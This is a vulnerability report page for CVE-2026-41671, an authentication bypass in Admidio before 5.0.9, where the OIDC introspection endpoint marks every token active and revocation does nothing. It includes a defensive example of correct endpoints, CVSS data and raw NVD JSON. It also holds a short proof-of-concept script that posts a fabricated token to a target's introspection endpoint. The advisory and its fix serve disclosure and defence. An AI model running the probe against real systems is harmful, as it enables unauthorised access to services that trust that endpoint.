Security Vulnerability Report
CVE-2026-41671 CVSS 6.8 MEDIUM


Published: 2026-05-07 04:16:33
Last Modified: 2026-05-07 14:54:41

Description

Admidio is an open-source user management solution. Prior to version 5.0.9, the OIDC token introspection endpoint (/modules/sso/index.php/oidc/introspect) always returns {"active": true} for every request, regardless of whether a valid token is provided, whether the token is expired, revoked, or completely fabricated. The endpoint performs no authentication of the calling resource server and no validation of the submitted token. Any resource server that relies on this introspection endpoint to validate access tokens will accept all requests as authorized, enabling complete authentication bypass. Additionally, the OIDC token revocation endpoint (/oidc/revoke) returns {"revoked": true} without actually revoking any token, preventing resource servers from invalidating compromised credentials. This issue has been patched in version 5.0.9.
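The description identifies two failures: the introspection endpoint neither authenticates the calling resource server nor checks the token, and the revocation endpoint reports success without changing state. The following is an added, stand-alone illustration of what a correct pair of endpoints must do (written for this report; it is not Admidio's code and does not model Admidio's data store). The token store, the registered resource server `rs-profile` and its secret are constructed values; the response shapes follow RFC 7662 (introspection) and RFC 7009 (revocation).

```python
import hmac
import secrets
import time

# Constructed in-memory token store: opaque token -> metadata.
# Hypothetical, not Admidio's data model.
TOKENS = {}
# Resource servers registered to call introspection, with their client secrets
# (constructed values).
RESOURCE_SERVERS = {"rs-profile": "constructed-rs-secret"}


def issue_token(subject, scope, ttl_seconds, now=None):
    """Mint an opaque access token and record its expiry (constructed helper)."""
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)
    TOKENS[token] = {"sub": subject, "scope": scope,
                     "exp": now + ttl_seconds, "revoked": False}
    return token


def _authenticate_caller(client_id, client_secret):
    # RFC 7662 section 2.1 requires the introspection endpoint to authenticate
    # the protected resource calling it. The vulnerable version skipped this.
    # Constant-time comparison avoids leaking the secret through timing.
    expected = RESOURCE_SERVERS.get(client_id)
    return expected is not None and hmac.compare_digest(expected, client_secret)


def introspect(token, client_id, client_secret, now=None):
    """RFC 7662 style response: only a known, unexpired, unrevoked token is active."""
    if not _authenticate_caller(client_id, client_secret):
        return {"error": "invalid_client"}
    now = time.time() if now is None else now
    meta = TOKENS.get(token)
    # Fabricated, expired and revoked tokens all collapse to the same minimal
    # answer, so the caller learns nothing beyond "not active".
    if meta is None or meta["revoked"] or now >= meta["exp"]:
        return {"active": False}
    return {"active": True, "sub": meta["sub"], "scope": meta["scope"],
            "exp": int(meta["exp"])}


def revoke(token, client_id, client_secret):
    """RFC 7009 style revocation: mark the token dead so later introspection denies it."""
    if not _authenticate_caller(client_id, client_secret):
        return {"error": "invalid_client"}
    meta = TOKENS.get(token)
    if meta is not None:
        meta["revoked"] = True
    # RFC 7009 answers success even for unknown tokens so callers cannot probe
    # which values exist; the state change above, not the status, is what
    # the vulnerable version was missing.
    return {"revoked": True}


def resource_server_accepts(token, client_id, client_secret, required_scope, now=None):
    """What a relying resource server should require before serving a request."""
    resp = introspect(token, client_id, client_secret, now=now)
    if resp.get("active") is not True:
        return False
    return required_scope in resp.get("scope", "").split()


if __name__ == "__main__":
    t = issue_token("alice", "profile email", 3600, now=1000.0)
    print(introspect(t, "rs-profile", "constructed-rs-secret", now=1500.0))
    print(introspect("attacker_fabricated_token_payload", "rs-profile",
                     "constructed-rs-secret", now=1500.0))
    print(revoke(t, "rs-profile", "constructed-rs-secret"))
    print(introspect(t, "rs-profile", "constructed-rs-secret", now=1500.0))
```

The resource-server helper shows the other half of the fix: a relying party must check `active` is literally `true` and that the returned scope covers the request, rather than treating any 200 response as authorization.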

CVSS Details

CVSS Score
6.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Admidio < 5.0.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests


def check_poc(url):
    # The vulnerable endpoint path
    target_url = f"{url}/modules/sso/index.php/oidc/introspect"
    # Use a completely invalid/fabricated token
    fake_token = "attacker_fabricated_token_payload"
    # Prepare the payload
    data = {"token": fake_token}
    try:
        response = requests.post(target_url, data=data, timeout=10)
        if response.status_code == 200:
            json_response = response.json()
            # Check if the server claims the fake token is active
            if json_response.get("active") is True:
                print("[+] Vulnerability Confirmed! The endpoint accepts invalid tokens.")
                print(f"[+] Response: {json_response}")
            else:
                print("[-] Token returned as inactive. System might be patched.")
        else:
            print(f"[-] Unexpected status code: {response.status_code}")
    except Exception as e:
        print(f"[!] Error during request: {e}")


if __name__ == "__main__":
    target = "http://localhost/admidio"  # Replace with actual target
    check_poc(target)

References

https://github.com/Admidio/admidio/releases/tag/v5.0.9
https://github.com/Admidio/admidio/security/advisories/GHSA-9xx5-cv6j-x533

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41671", "sourceIdentifier": "[email protected]", "published": "2026-05-07T04:16:32.863", "lastModified": "2026-05-07T14:54:40.603", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Admidio is an open-source user management solution. Prior to version 5.0.9, the OIDC token introspection endpoint (/modules/sso/index.php/oidc/introspect) always returns {\"active\": true} for every request, regardless of whether a valid token is provided, whether the token is expired, revoked, or completely fabricated. The endpoint performs no authentication of the calling resource server and no validation of the submitted token. Any resource server that relies on this introspection endpoint to validate access tokens will accept all requests as authorized, enabling complete authentication bypass. Additionally, the OIDC token revocation endpoint (/oidc/revoke) returns {\"revoked\": true} without actually revoking any token, preventing resource servers from invalidating compromised credentials. This issue has been patched in version 5.0.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-287"}]}], "references": [{"url": "https://github.com/Admidio/admidio/releases/tag/v5.0.9", "source": "[email protected]"}, {"url": "https://github.com/Admidio/admidio/security/advisories/GHSA-9xx5-cv6j-x533", "source": "[email protected]"}]}}